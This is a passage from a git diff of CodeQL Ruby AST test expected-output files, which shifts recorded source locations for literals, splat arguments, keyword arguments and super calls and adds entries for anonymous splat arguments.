calls/calls.rb:316:12:316:19 | -2 | -2 | int | -| calls/calls.rb:316:22:316:27 | -1 | -1 | int | -| calls/calls.rb:316:26:316:26 | 4 | 4 | int | -| calls/calls.rb:316:32:316:32 | 1 | 1 | int | -| calls/calls.rb:316:35:316:35 | 2 | 2 | int | -| calls/calls.rb:316:38:316:38 | 3 | 3 | int | -| calls/calls.rb:316:41:316:41 | 4 | 4 | int | -| calls/calls.rb:317:1:317:1 | 0 | 0 | int | -| calls/calls.rb:317:5:317:10 | 1 | 1 | int | -| calls/calls.rb:317:5:317:10 | -1 | -1 | int | -| calls/calls.rb:317:9:317:9 | 5 | 5 | int | -| calls/calls.rb:317:15:317:15 | 1 | 1 | int | -| calls/calls.rb:317:18:317:18 | 2 | 2 | int | -| calls/calls.rb:317:21:317:21 | 3 | 3 | int | -| calls/calls.rb:318:15:318:15 | 1 | 1 | int | -| calls/calls.rb:319:5:319:5 | 0 | 0 | int | -| calls/calls.rb:319:5:319:5 | __synth__1 | 0 | int | -| calls/calls.rb:319:5:319:5 | __synth__1 | 0 | int | -| calls/calls.rb:319:11:319:11 | 1 | 1 | int | -| calls/calls.rb:320:9:320:9 | 0 | 0 | int | -| calls/calls.rb:320:9:320:9 | __synth__1 | 0 | int | -| calls/calls.rb:320:9:320:9 | __synth__1 | 0 | int | -| calls/calls.rb:320:31:320:31 | 1 | 1 | int | -| calls/calls.rb:320:37:320:37 | 2 | 2 | int | -| calls/calls.rb:328:31:328:37 | "error" | error | string | -| calls/calls.rb:340:5:340:5 | 0 | 0 | int | -| calls/calls.rb:340:8:340:8 | 1 | 1 | int | -| calls/calls.rb:340:11:340:11 | 2 | 2 | int | -| calls/calls.rb:340:18:340:18 | 1 | 1 | int | -| calls/calls.rb:340:20:340:20 | 2 | 2 | int | -| calls/calls.rb:340:22:340:22 | 3 | 3 | int | -| calls/calls.rb:340:27:340:27 | 4 | 4 | int | -| calls/calls.rb:340:29:340:29 | 5 | 5 | int | -| calls/calls.rb:340:31:340:31 | 6 | 6 | int | -| calls/calls.rb:344:5:344:5 | :x | :x | symbol | -| calls/calls.rb:344:8:344:9 | 42 | 42 | int | -| calls/calls.rb:345:5:345:5 | :x | :x | symbol | -| calls/calls.rb:345:9:345:13 | :novar | :novar | symbol | -| calls/calls.rb:346:5:346:5 | :X | :X | symbol | +| calls/calls.rb:280:5:280:8 | :blah | :blah | symbol | +| calls/calls.rb:281:5:281:8 | :blah | :blah | symbol | +| calls/calls.rb:290:11:290:16 | "blah" | blah | string | +| calls/calls.rb:291:11:291:11 | 1 | 1 | int | +| calls/calls.rb:291:14:291:14 | 2 | 2 | int | +| calls/calls.rb:291:17:291:17 | 3 | 3 | int | +| calls/calls.rb:292:21:292:21 | 1 | 1 | int | +| calls/calls.rb:293:22:293:22 | 2 | 2 | int | +| calls/calls.rb:294:11:294:11 | 4 | 4 | int | +| calls/calls.rb:294:14:294:14 | 5 | 5 | int | +| calls/calls.rb:294:26:294:28 | 100 | 100 | int | +| calls/calls.rb:295:11:295:11 | 6 | 6 | int | +| calls/calls.rb:295:14:295:14 | 7 | 7 | int | +| calls/calls.rb:295:27:295:29 | 200 | 200 | int | +| calls/calls.rb:313:6:313:6 | 1 | 1 | int | +| calls/calls.rb:316:1:316:8 | __synth__0 | 10 | int | +| calls/calls.rb:316:12:316:13 | 10 | 10 | int | +| calls/calls.rb:317:1:317:6 | __synth__0 | 10 | int | +| calls/calls.rb:317:5:317:5 | 0 | 0 | int | +| calls/calls.rb:317:10:317:11 | 10 | 10 | int | +| calls/calls.rb:318:1:318:8 | 0 | 0 | int | +| calls/calls.rb:318:12:318:19 | 1 | 1 | int | +| calls/calls.rb:318:12:318:19 | -2 | -2 | int | +| calls/calls.rb:318:22:318:27 | -1 | -1 | int | +| calls/calls.rb:318:26:318:26 | 4 | 4 | int | +| calls/calls.rb:318:32:318:32 | 1 | 1 | int | +| calls/calls.rb:318:35:318:35 | 2 | 2 | int | +| calls/calls.rb:318:38:318:38 | 3 | 3 | int | +| calls/calls.rb:318:41:318:41 | 4 | 4 | int | +| calls/calls.rb:319:1:319:1 | 0 | 0 | int | +| calls/calls.rb:319:5:319:10 | 1 | 1 | int | +| calls/calls.rb:319:5:319:10 | -1 | -1 | int | +| calls/calls.rb:319:9:319:9 | 5 | 5 | int | +| calls/calls.rb:319:15:319:15 | 1 | 1 | int | +| calls/calls.rb:319:18:319:18 | 2 | 2 | int | +| calls/calls.rb:319:21:319:21 | 3 | 3 | int | +| calls/calls.rb:320:15:320:15 | 1 | 1 | int | +| calls/calls.rb:321:5:321:5 | 0 | 0 | int | +| calls/calls.rb:321:5:321:5 | __synth__1 | 0 | int | +| calls/calls.rb:321:5:321:5 | __synth__1 | 0 | int | +| calls/calls.rb:321:11:321:11 | 1 | 1 | int | +| calls/calls.rb:322:9:322:9 | 0 | 0 | int | +| calls/calls.rb:322:9:322:9 | __synth__1 | 0 | int | +| calls/calls.rb:322:9:322:9 | __synth__1 | 0 | int | +| calls/calls.rb:322:31:322:31 | 1 | 1 | int | +| calls/calls.rb:322:37:322:37 | 2 | 2 | int | +| calls/calls.rb:330:31:330:37 | "error" | error | string | +| calls/calls.rb:342:5:342:5 | 0 | 0 | int | +| calls/calls.rb:342:8:342:8 | 1 | 1 | int | +| calls/calls.rb:342:11:342:11 | 2 | 2 | int | +| calls/calls.rb:342:18:342:18 | 1 | 1 | int | +| calls/calls.rb:342:20:342:20 | 2 | 2 | int | +| calls/calls.rb:342:22:342:22 | 3 | 3 | int | +| calls/calls.rb:342:27:342:27 | 4 | 4 | int | +| calls/calls.rb:342:29:342:29 | 5 | 5 | int | +| calls/calls.rb:342:31:342:31 | 6 | 6 | int | +| calls/calls.rb:346:5:346:5 | :x | :x | symbol | | calls/calls.rb:346:8:346:9 | 42 | 42 | int | -| calls/calls.rb:347:5:347:5 | :X | :X | symbol | -| calls/calls.rb:350:5:350:5 | 1 | 1 | int | -| calls/calls.rb:362:1:362:4 | nil | nil | nil | -| calls/calls.rb:362:5:362:6 | nil | nil | nil | -| calls/calls.rb:364:1:364:3 | nil | nil | nil | -| calls/calls.rb:364:4:364:5 | nil | nil | nil | -| calls/calls.rb:364:10:364:10 | 1 | 1 | int | -| calls/calls.rb:364:12:364:12 | 2 | 2 | int | +| calls/calls.rb:347:5:347:5 | :x | :x | symbol | +| calls/calls.rb:347:9:347:13 | :novar | :novar | symbol | +| calls/calls.rb:348:5:348:5 | :X | :X | symbol | +| calls/calls.rb:348:8:348:9 | 42 | 42 | int | +| calls/calls.rb:349:5:349:5 | :X | :X | symbol | +| calls/calls.rb:352:5:352:5 | 1 | 1 | int | +| calls/calls.rb:364:1:364:4 | nil | nil | nil | +| calls/calls.rb:364:5:364:6 | nil | nil | nil | +| calls/calls.rb:366:1:366:3 | nil | nil | nil | +| calls/calls.rb:366:4:366:5 | nil | nil | nil | +| calls/calls.rb:366:10:366:10 | 1 | 1 | int | +| calls/calls.rb:366:12:366:12 | 2 | 2 | int | | constants/constants.rb:3:19:3:27 | "const_a" | const_a | string | | constants/constants.rb:6:15:6:23 | "const_b" | const_b | string | | constants/constants.rb:17:12:17:18 | "Hello" | Hello | string | @@ -920,76 +920,76 @@ exprCfgNodeValue | calls/calls.rb:26:7:26:7 | 1 | 1 | int | | calls/calls.rb:36:9:36:11 | 100 | 100 | int | | calls/calls.rb:36:14:36:16 | 200 | 200 | int | -| calls/calls.rb:278:5:278:8 | :blah | :blah | symbol | -| calls/calls.rb:279:5:279:8 | :blah | :blah | symbol | -| calls/calls.rb:288:11:288:16 | "blah" | blah | string | -| calls/calls.rb:289:11:289:11 | 1 | 1 | int | -| calls/calls.rb:289:14:289:14 | 2 | 2 | int | -| calls/calls.rb:289:17:289:17 | 3 | 3 | int | -| calls/calls.rb:290:21:290:21 | 1 | 1 | int | -| calls/calls.rb:291:22:291:22 | 2 | 2 | int | -| calls/calls.rb:292:11:292:11 | 4 | 4 | int | -| calls/calls.rb:292:14:292:14 | 5 | 5 | int | -| calls/calls.rb:292:26:292:28 | 100 | 100 | int | -| calls/calls.rb:293:11:293:11 | 6 | 6 | int | -| calls/calls.rb:293:14:293:14 | 7 | 7 | int | -| calls/calls.rb:293:27:293:29 | 200 | 200 | int | -| calls/calls.rb:311:6:311:6 | 1 | 1 | int | -| calls/calls.rb:314:1:314:8 | __synth__0 | 10 | int | -| calls/calls.rb:314:12:314:13 | 10 | 10 | int | -| calls/calls.rb:315:1:315:6 | __synth__0 | 10 | int | -| calls/calls.rb:315:5:315:5 | 0 | 0 | int | -| calls/calls.rb:315:10:315:11 | 10 | 10 | int | -| calls/calls.rb:316:1:316:8 | 0 | 0 | int | -| calls/calls.rb:316:12:316:19 | 1 | 1 | int | -| calls/calls.rb:316:12:316:19 | -2 | -2 | int | -| calls/calls.rb:316:22:316:27 | -1 | -1 | int | -| calls/calls.rb:316:26:316:26 | 4 | 4 | int | -| calls/calls.rb:316:32:316:32 | 1 | 1 | int | -| calls/calls.rb:316:35:316:35 | 2 | 2 | int | -| calls/calls.rb:316:38:316:38 | 3 | 3 | int | -| calls/calls.rb:316:41:316:41 | 4 | 4 | int | -| calls/calls.rb:317:1:317:1 | 0 | 0 | int | -| calls/calls.rb:317:5:317:10 | 1 | 1 | int | -| calls/calls.rb:317:5:317:10 | -1 | -1 | int | -| calls/calls.rb:317:9:317:9 | 5 | 5 | int | -| calls/calls.rb:317:15:317:15 | 1 | 1 | int | -| calls/calls.rb:317:18:317:18 | 2 | 2 | int | -| calls/calls.rb:317:21:317:21 | 3 | 3 | int | -| calls/calls.rb:318:15:318:15 | 1 | 1 | int | -| calls/calls.rb:319:5:319:5 | 0 | 0 | int | -| calls/calls.rb:319:5:319:5 | __synth__1 | 0 | int | -| calls/calls.rb:319:5:319:5 | __synth__1 | 0 | int | -| calls/calls.rb:319:11:319:11 | 1 | 1 | int | -| calls/calls.rb:320:9:320:9 | 0 | 0 | int | -| calls/calls.rb:320:9:320:9 | __synth__1 | 0 | int | -| calls/calls.rb:320:9:320:9 | __synth__1 | 0 | int | -| calls/calls.rb:320:31:320:31 | 1 | 1 | int | -| calls/calls.rb:320:37:320:37 | 2 | 2 | int | -| calls/calls.rb:328:31:328:37 | "error" | error | string | -| calls/calls.rb:340:5:340:5 | 0 | 0 | int | -| calls/calls.rb:340:8:340:8 | 1 | 1 | int | -| calls/calls.rb:340:11:340:11 | 2 | 2 | int | -| calls/calls.rb:340:18:340:18 | 1 | 1 | int | -| calls/calls.rb:340:20:340:20 | 2 | 2 | int | -| calls/calls.rb:340:22:340:22 | 3 | 3 | int | -| calls/calls.rb:340:27:340:27 | 4 | 4 | int | -| calls/calls.rb:340:29:340:29 | 5 | 5 | int | -| calls/calls.rb:340:31:340:31 | 6 | 6 | int | -| calls/calls.rb:344:5:344:5 | :x | :x | symbol | -| calls/calls.rb:344:8:344:9 | 42 | 42 | int | -| calls/calls.rb:345:5:345:5 | :x | :x | symbol | -| calls/calls.rb:345:9:345:13 | :novar | :novar | symbol | -| calls/calls.rb:346:5:346:5 | :X | :X | symbol | +| calls/calls.rb:280:5:280:8 | :blah | :blah | symbol | +| calls/calls.rb:281:5:281:8 | :blah | :blah | symbol | +| calls/calls.rb:290:11:290:16 | "blah" | blah | string | +| calls/calls.rb:291:11:291:11 | 1 | 1 | int | +| calls/calls.rb:291:14:291:14 | 2 | 2 | int | +| calls/calls.rb:291:17:291:17 | 3 | 3 | int | +| calls/calls.rb:292:21:292:21 | 1 | 1 | int | +| calls/calls.rb:293:22:293:22 | 2 | 2 | int | +| calls/calls.rb:294:11:294:11 | 4 | 4 | int | +| calls/calls.rb:294:14:294:14 | 5 | 5 | int | +| calls/calls.rb:294:26:294:28 | 100 | 100 | int | +| calls/calls.rb:295:11:295:11 | 6 | 6 | int | +| calls/calls.rb:295:14:295:14 | 7 | 7 | int | +| calls/calls.rb:295:27:295:29 | 200 | 200 | int | +| calls/calls.rb:313:6:313:6 | 1 | 1 | int | +| calls/calls.rb:316:1:316:8 | __synth__0 | 10 | int | +| calls/calls.rb:316:12:316:13 | 10 | 10 | int | +| calls/calls.rb:317:1:317:6 | __synth__0 | 10 | int | +| calls/calls.rb:317:5:317:5 | 0 | 0 | int | +| calls/calls.rb:317:10:317:11 | 10 | 10 | int | +| calls/calls.rb:318:1:318:8 | 0 | 0 | int | +| calls/calls.rb:318:12:318:19 | 1 | 1 | int | +| calls/calls.rb:318:12:318:19 | -2 | -2 | int | +| calls/calls.rb:318:22:318:27 | -1 | -1 | int | +| calls/calls.rb:318:26:318:26 | 4 | 4 | int | +| calls/calls.rb:318:32:318:32 | 1 | 1 | int | +| calls/calls.rb:318:35:318:35 | 2 | 2 | int | +| calls/calls.rb:318:38:318:38 | 3 | 3 | int | +| calls/calls.rb:318:41:318:41 | 4 | 4 | int | +| calls/calls.rb:319:1:319:1 | 0 | 0 | int | +| calls/calls.rb:319:5:319:10 | 1 | 1 | int | +| calls/calls.rb:319:5:319:10 | -1 | -1 | int | +| calls/calls.rb:319:9:319:9 | 5 | 5 | int | +| calls/calls.rb:319:15:319:15 | 1 | 1 | int | +| calls/calls.rb:319:18:319:18 | 2 | 2 | int | +| calls/calls.rb:319:21:319:21 | 3 | 3 | int | +| calls/calls.rb:320:15:320:15 | 1 | 1 | int | +| calls/calls.rb:321:5:321:5 | 0 | 0 | int | +| calls/calls.rb:321:5:321:5 | __synth__1 | 0 | int | +| calls/calls.rb:321:5:321:5 | __synth__1 | 0 | int | +| calls/calls.rb:321:11:321:11 | 1 | 1 | int | +| calls/calls.rb:322:9:322:9 | 0 | 0 | int | +| calls/calls.rb:322:9:322:9 | __synth__1 | 0 | int | +| calls/calls.rb:322:9:322:9 | __synth__1 | 0 | int | +| calls/calls.rb:322:31:322:31 | 1 | 1 | int | +| calls/calls.rb:322:37:322:37 | 2 | 2 | int | +| calls/calls.rb:330:31:330:37 | "error" | error | string | +| calls/calls.rb:342:5:342:5 | 0 | 0 | int | +| calls/calls.rb:342:8:342:8 | 1 | 1 | int | +| calls/calls.rb:342:11:342:11 | 2 | 2 | int | +| calls/calls.rb:342:18:342:18 | 1 | 1 | int | +| calls/calls.rb:342:20:342:20 | 2 | 2 | int | +| calls/calls.rb:342:22:342:22 | 3 | 3 | int | +| calls/calls.rb:342:27:342:27 | 4 | 4 | int | +| calls/calls.rb:342:29:342:29 | 5 | 5 | int | +| calls/calls.rb:342:31:342:31 | 6 | 6 | int | +| calls/calls.rb:346:5:346:5 | :x | :x | symbol | | calls/calls.rb:346:8:346:9 | 42 | 42 | int | -| calls/calls.rb:347:5:347:5 | :X | :X | symbol | -| calls/calls.rb:350:5:350:5 | 1 | 1 | int | -| calls/calls.rb:362:1:362:4 | nil | nil | nil | -| calls/calls.rb:362:5:362:6 | nil | nil | nil | -| calls/calls.rb:364:1:364:3 | nil | nil | nil | -| calls/calls.rb:364:4:364:5 | nil | nil | nil | -| calls/calls.rb:364:10:364:10 | 1 | 1 | int | -| calls/calls.rb:364:12:364:12 | 2 | 2 | int | +| calls/calls.rb:347:5:347:5 | :x | :x | symbol | +| calls/calls.rb:347:9:347:13 | :novar | :novar | symbol | +| calls/calls.rb:348:5:348:5 | :X | :X | symbol | +| calls/calls.rb:348:8:348:9 | 42 | 42 | int | +| calls/calls.rb:349:5:349:5 | :X | :X | symbol | +| calls/calls.rb:352:5:352:5 | 1 | 1 | int | +| calls/calls.rb:364:1:364:4 | nil | nil | nil | +| calls/calls.rb:364:5:364:6 | nil | nil | nil | +| calls/calls.rb:366:1:366:3 | nil | nil | nil | +| calls/calls.rb:366:4:366:5 | nil | nil | nil | +| calls/calls.rb:366:10:366:10 | 1 | 1 | int | +| calls/calls.rb:366:12:366:12 | 2 | 2 | int | | constants/constants.rb:3:19:3:27 | "const_a" | const_a | string | | constants/constants.rb:6:15:6:23 | "const_b" | const_b | string | | constants/constants.rb:17:12:17:18 | "Hello" | Hello | string | diff --git a/ruby/ql/test/library-tests/ast/calls/arguments.expected b/ruby/ql/test/library-tests/ast/calls/arguments.expected index 260eae94654..9a00295634f 100644 --- a/ruby/ql/test/library-tests/ast/calls/arguments.expected +++ b/ruby/ql/test/library-tests/ast/calls/arguments.expected @@ -4,27 +4,27 @@ blockArguments splatExpr | calls.rb:270:5:270:8 | * ... | calls.rb:270:6:270:8 | call to bar | | calls.rb:271:5:271:11 | * ... | calls.rb:271:6:271:11 | call to bar | -| calls.rb:316:31:316:42 | * ... | calls.rb:316:31:316:42 | [...] | -| calls.rb:317:14:317:22 | * ... | calls.rb:317:14:317:22 | [...] | -| calls.rb:340:1:342:3 | * ... | calls.rb:340:1:342:3 | __synth__0__1 | +| calls.rb:318:31:318:42 | * ... | calls.rb:318:31:318:42 | [...] | +| calls.rb:319:14:319:22 | * ... | calls.rb:319:14:319:22 | [...] | +| calls.rb:342:1:344:3 | * ... | calls.rb:342:1:344:3 | __synth__0__1 | hashSplatExpr -| calls.rb:274:5:274:9 | ** ... | calls.rb:274:7:274:9 | call to bar | -| calls.rb:275:5:275:12 | ** ... | calls.rb:275:7:275:12 | call to bar | +| calls.rb:275:5:275:9 | ** ... | calls.rb:275:7:275:9 | call to bar | +| calls.rb:276:5:276:12 | ** ... | calls.rb:276:7:276:12 | call to bar | keywordArguments | calls.rb:249:3:249:12 | Pair | calls.rb:249:3:249:5 | call to foo | calls.rb:249:10:249:12 | call to bar | | calls.rb:249:15:249:30 | Pair | calls.rb:249:15:249:20 | call to foo | calls.rb:249:25:249:30 | call to bar | -| calls.rb:278:5:278:13 | Pair | calls.rb:278:5:278:8 | :blah | calls.rb:278:11:278:13 | call to bar | -| calls.rb:279:5:279:16 | Pair | calls.rb:279:5:279:8 | :blah | calls.rb:279:11:279:16 | call to bar | -| calls.rb:344:5:344:9 | Pair | calls.rb:344:5:344:5 | :x | calls.rb:344:8:344:9 | 42 | -| calls.rb:345:5:345:6 | Pair | calls.rb:345:5:345:5 | :x | calls.rb:345:5:345:5 | x | -| calls.rb:345:9:345:14 | Pair | calls.rb:345:9:345:13 | :novar | calls.rb:345:9:345:13 | call to novar | -| calls.rb:346:5:346:9 | Pair | calls.rb:346:5:346:5 | :X | calls.rb:346:8:346:9 | 42 | -| calls.rb:347:5:347:6 | Pair | calls.rb:347:5:347:5 | :X | calls.rb:347:5:347:5 | X | +| calls.rb:280:5:280:13 | Pair | calls.rb:280:5:280:8 | :blah | calls.rb:280:11:280:13 | call to bar | +| calls.rb:281:5:281:16 | Pair | calls.rb:281:5:281:8 | :blah | calls.rb:281:11:281:16 | call to bar | +| calls.rb:346:5:346:9 | Pair | calls.rb:346:5:346:5 | :x | calls.rb:346:8:346:9 | 42 | +| calls.rb:347:5:347:6 | Pair | calls.rb:347:5:347:5 | :x | calls.rb:347:5:347:5 | x | +| calls.rb:347:9:347:14 | Pair | calls.rb:347:9:347:13 | :novar | calls.rb:347:9:347:13 | call to novar | +| calls.rb:348:5:348:9 | Pair | calls.rb:348:5:348:5 | :X | calls.rb:348:8:348:9 | 42 | +| calls.rb:349:5:349:6 | Pair | calls.rb:349:5:349:5 | :X | calls.rb:349:5:349:5 | X | keywordArgumentsByKeyword -| calls.rb:278:1:278:14 | call to foo | blah | calls.rb:278:11:278:13 | call to bar | -| calls.rb:279:1:279:17 | call to foo | blah | calls.rb:279:11:279:16 | call to bar | -| calls.rb:344:1:344:10 | call to foo | x | calls.rb:344:8:344:9 | 42 | -| calls.rb:345:1:345:15 | call to foo | novar | calls.rb:345:9:345:13 | call to novar | -| calls.rb:345:1:345:15 | call to foo | x | calls.rb:345:5:345:5 | x | -| calls.rb:346:1:346:10 | call to foo | X | calls.rb:346:8:346:9 | 42 | -| calls.rb:347:1:347:7 | call to foo | X | calls.rb:347:5:347:5 | X | +| calls.rb:280:1:280:14 | call to foo | blah | calls.rb:280:11:280:13 | call to bar | +| calls.rb:281:1:281:17 | call to foo | blah | calls.rb:281:11:281:16 | call to bar | +| calls.rb:346:1:346:10 | call to foo | x | calls.rb:346:8:346:9 | 42 | +| calls.rb:347:1:347:15 | call to foo | novar | calls.rb:347:9:347:13 | call to novar | +| calls.rb:347:1:347:15 | call to foo | x | calls.rb:347:5:347:5 | x | +| calls.rb:348:1:348:10 | call to foo | X | calls.rb:348:8:348:9 | 42 | +| calls.rb:349:1:349:7 | call to foo | X | calls.rb:349:5:349:5 | X | diff --git a/ruby/ql/test/library-tests/ast/calls/calls.expected b/ruby/ql/test/library-tests/ast/calls/calls.expected index 048ebfcc280..a5d0fe1d272 100644 --- a/ruby/ql/test/library-tests/ast/calls/calls.expected +++ b/ruby/ql/test/library-tests/ast/calls/calls.expected @@ -1,9 +1,11 @@ callsWithNoReceiverArgumentsOrBlock | calls.rb:31:3:31:7 | yield ... | (none) | -| calls.rb:286:5:286:9 | super call to my_method | my_method | -| calls.rb:287:5:287:11 | super call to my_method | my_method | -| calls.rb:305:5:305:9 | super call to another_method | another_method | -| calls.rb:345:9:345:13 | call to novar | novar | +| calls.rb:272:5:272:5 | * ... | * | +| calls.rb:277:5:277:6 | ** ... | ** | +| calls.rb:288:5:288:9 | super call to my_method | my_method | +| calls.rb:289:5:289:11 | super call to my_method | my_method | +| calls.rb:307:5:307:9 | super call to another_method | another_method | +| calls.rb:347:9:347:13 | call to novar | novar | callsWithArguments | calls.rb:14:1:14:11 | call to foo | foo | 0 | calls.rb:14:5:14:5 | 0 | | calls.rb:14:1:14:11 | call to foo | foo | 1 | calls.rb:14:8:14:8 | 1 | @@ -30,96 +32,98 @@ callsWithArguments | calls.rb:268:1:268:6 | call to foo | foo | 0 | calls.rb:268:5:268:5 | &... | | calls.rb:270:1:270:9 | call to foo | foo | 0 | calls.rb:270:5:270:8 | * ... | | calls.rb:271:1:271:12 | call to foo | foo | 0 | calls.rb:271:5:271:11 | * ... | -| calls.rb:274:1:274:10 | call to foo | foo | 0 | calls.rb:274:5:274:9 | ** ... | -| calls.rb:275:1:275:13 | call to foo | foo | 0 | calls.rb:275:5:275:12 | ** ... | -| calls.rb:278:1:278:14 | call to foo | foo | 0 | calls.rb:278:5:278:13 | Pair | -| calls.rb:279:1:279:17 | call to foo | foo | 0 | calls.rb:279:5:279:16 | Pair | -| calls.rb:288:5:288:16 | super call to my_method | my_method | 0 | calls.rb:288:11:288:16 | "blah" | -| calls.rb:289:5:289:17 | super call to my_method | my_method | 0 | calls.rb:289:11:289:11 | 1 | -| calls.rb:289:5:289:17 | super call to my_method | my_method | 1 | calls.rb:289:14:289:14 | 2 | -| calls.rb:289:5:289:17 | super call to my_method | my_method | 2 | calls.rb:289:17:289:17 | 3 | -| calls.rb:290:17:290:21 | ... + ... | + | 0 | calls.rb:290:21:290:21 | 1 | -| calls.rb:291:18:291:22 | ... * ... | * | 0 | calls.rb:291:22:291:22 | 2 | -| calls.rb:292:5:292:30 | super call to my_method | my_method | 0 | calls.rb:292:11:292:11 | 4 | -| calls.rb:292:5:292:30 | super call to my_method | my_method | 1 | calls.rb:292:14:292:14 | 5 | -| calls.rb:292:22:292:28 | ... + ... | + | 0 | calls.rb:292:26:292:28 | 100 | -| calls.rb:293:5:293:33 | super call to my_method | my_method | 0 | calls.rb:293:11:293:11 | 6 | -| calls.rb:293:5:293:33 | super call to my_method | my_method | 1 | calls.rb:293:14:293:14 | 7 | -| calls.rb:293:23:293:29 | ... + ... | + | 0 | calls.rb:293:27:293:29 | 200 | -| calls.rb:311:1:311:7 | call to call | call | 0 | calls.rb:311:6:311:6 | 1 | -| calls.rb:314:1:314:8 | call to foo= | foo= | 0 | calls.rb:314:12:314:13 | ... = ... | -| calls.rb:315:1:315:6 | ...[...] | [] | 0 | calls.rb:315:5:315:5 | 0 | -| calls.rb:315:1:315:6 | call to []= | []= | 0 | calls.rb:315:5:315:5 | 0 | -| calls.rb:315:1:315:6 | call to []= | []= | 1 | calls.rb:315:10:315:11 | ... = ... | -| calls.rb:316:1:316:8 | call to [] | [] | 0 | calls.rb:316:1:316:8 | 0 | -| calls.rb:316:1:316:8 | call to foo= | foo= | 0 | calls.rb:316:1:316:8 | ... = ... | -| calls.rb:316:12:316:19 | call to [] | [] | 0 | calls.rb:316:12:316:19 | _ .. _ | -| calls.rb:316:12:316:19 | call to bar= | bar= | 0 | calls.rb:316:12:316:19 | ... = ... | -| calls.rb:316:22:316:27 | ...[...] | [] | 0 | calls.rb:316:26:316:26 | 4 | -| calls.rb:316:22:316:27 | call to [] | [] | 0 | calls.rb:316:22:316:27 | -1 | -| calls.rb:316:22:316:27 | call to []= | []= | 0 | calls.rb:316:26:316:26 | 4 | -| calls.rb:316:22:316:27 | call to []= | []= | 1 | calls.rb:316:22:316:27 | ... = ... | -| calls.rb:316:31:316:42 | call to [] | [] | 0 | calls.rb:316:32:316:32 | 1 | -| calls.rb:316:31:316:42 | call to [] | [] | 1 | calls.rb:316:35:316:35 | 2 | -| calls.rb:316:31:316:42 | call to [] | [] | 2 | calls.rb:316:38:316:38 | 3 | -| calls.rb:316:31:316:42 | call to [] | [] | 3 | calls.rb:316:41:316:41 | 4 | -| calls.rb:317:1:317:1 | call to [] | [] | 0 | calls.rb:317:1:317:1 | 0 | -| calls.rb:317:5:317:10 | ...[...] | [] | 0 | calls.rb:317:9:317:9 | 5 | -| calls.rb:317:5:317:10 | call to [] | [] | 0 | calls.rb:317:5:317:10 | _ .. _ | -| calls.rb:317:5:317:10 | call to []= | []= | 0 | calls.rb:317:9:317:9 | 5 | -| calls.rb:317:5:317:10 | call to []= | []= | 1 | calls.rb:317:5:317:10 | ... = ... | -| calls.rb:317:14:317:22 | call to [] | [] | 0 | calls.rb:317:15:317:15 | 1 | -| calls.rb:317:14:317:22 | call to [] | [] | 1 | calls.rb:317:18:317:18 | 2 | -| calls.rb:317:14:317:22 | call to [] | [] | 2 | calls.rb:317:21:317:21 | 3 | -| calls.rb:318:1:318:10 | call to count= | count= | 1 | calls.rb:318:12:318:13 | __synth__1 | -| calls.rb:318:12:318:13 | ... + ... | + | 0 | calls.rb:318:15:318:15 | 1 | -| calls.rb:319:1:319:6 | ...[...] | [] | 0 | calls.rb:319:5:319:5 | 0 | -| calls.rb:319:1:319:6 | call to [] | [] | 0 | calls.rb:319:5:319:5 | __synth__1 | -| calls.rb:319:1:319:6 | call to []= | []= | 0 | calls.rb:319:5:319:5 | __synth__1 | -| calls.rb:319:1:319:6 | call to []= | []= | 2 | calls.rb:319:8:319:9 | __synth__2 | -| calls.rb:319:8:319:9 | ... + ... | + | 0 | calls.rb:319:11:319:11 | 1 | -| calls.rb:320:1:320:32 | ...[...] | [] | 0 | calls.rb:320:9:320:9 | 0 | -| calls.rb:320:1:320:32 | ...[...] | [] | 1 | calls.rb:320:12:320:18 | call to baz | -| calls.rb:320:1:320:32 | ...[...] | [] | 2 | calls.rb:320:21:320:31 | ... + ... | -| calls.rb:320:1:320:32 | call to [] | [] | 0 | calls.rb:320:9:320:9 | __synth__1 | -| calls.rb:320:1:320:32 | call to [] | [] | 1 | calls.rb:320:12:320:18 | __synth__2 | -| calls.rb:320:1:320:32 | call to [] | [] | 2 | calls.rb:320:21:320:31 | __synth__3 | -| calls.rb:320:1:320:32 | call to []= | []= | 0 | calls.rb:320:9:320:9 | __synth__1 | -| calls.rb:320:1:320:32 | call to []= | []= | 1 | calls.rb:320:12:320:18 | __synth__2 | -| calls.rb:320:1:320:32 | call to []= | []= | 2 | calls.rb:320:21:320:31 | __synth__3 | -| calls.rb:320:1:320:32 | call to []= | []= | 4 | calls.rb:320:34:320:35 | __synth__4 | -| calls.rb:320:21:320:31 | ... + ... | + | 0 | calls.rb:320:31:320:31 | 1 | -| calls.rb:320:34:320:35 | ... * ... | * | 0 | calls.rb:320:37:320:37 | 2 | -| calls.rb:328:25:328:37 | call to print | print | 0 | calls.rb:328:31:328:37 | "error" | -| calls.rb:332:3:332:12 | super call to foo | foo | 0 | calls.rb:332:9:332:11 | ... | -| calls.rb:336:3:336:13 | call to bar | bar | 0 | calls.rb:336:7:336:7 | b | -| calls.rb:336:3:336:13 | call to bar | bar | 1 | calls.rb:336:10:336:12 | ... | -| calls.rb:340:5:340:5 | call to [] | [] | 0 | calls.rb:340:5:340:5 | 0 | -| calls.rb:340:8:340:8 | call to [] | [] | 0 | calls.rb:340:8:340:8 | 1 | -| calls.rb:340:11:340:11 | call to [] | [] | 0 | calls.rb:340:11:340:11 | 2 | -| calls.rb:340:16:340:33 | call to [] | [] | 0 | calls.rb:340:17:340:23 | [...] | -| calls.rb:340:16:340:33 | call to [] | [] | 1 | calls.rb:340:26:340:32 | [...] | -| calls.rb:340:17:340:23 | call to [] | [] | 0 | calls.rb:340:18:340:18 | 1 | -| calls.rb:340:17:340:23 | call to [] | [] | 1 | calls.rb:340:20:340:20 | 2 | -| calls.rb:340:17:340:23 | call to [] | [] | 2 | calls.rb:340:22:340:22 | 3 | -| calls.rb:340:26:340:32 | call to [] | [] | 0 | calls.rb:340:27:340:27 | 4 | -| calls.rb:340:26:340:32 | call to [] | [] | 1 | calls.rb:340:29:340:29 | 5 | -| calls.rb:340:26:340:32 | call to [] | [] | 2 | calls.rb:340:31:340:31 | 6 | -| calls.rb:341:3:341:13 | call to foo | foo | 0 | calls.rb:341:7:341:7 | x | -| calls.rb:341:3:341:13 | call to foo | foo | 1 | calls.rb:341:10:341:10 | y | -| calls.rb:341:3:341:13 | call to foo | foo | 2 | calls.rb:341:13:341:13 | z | -| calls.rb:344:1:344:10 | call to foo | foo | 0 | calls.rb:344:5:344:9 | Pair | -| calls.rb:345:1:345:15 | call to foo | foo | 0 | calls.rb:345:5:345:6 | Pair | -| calls.rb:345:1:345:15 | call to foo | foo | 1 | calls.rb:345:9:345:14 | Pair | +| calls.rb:272:1:272:6 | call to foo | foo | 0 | 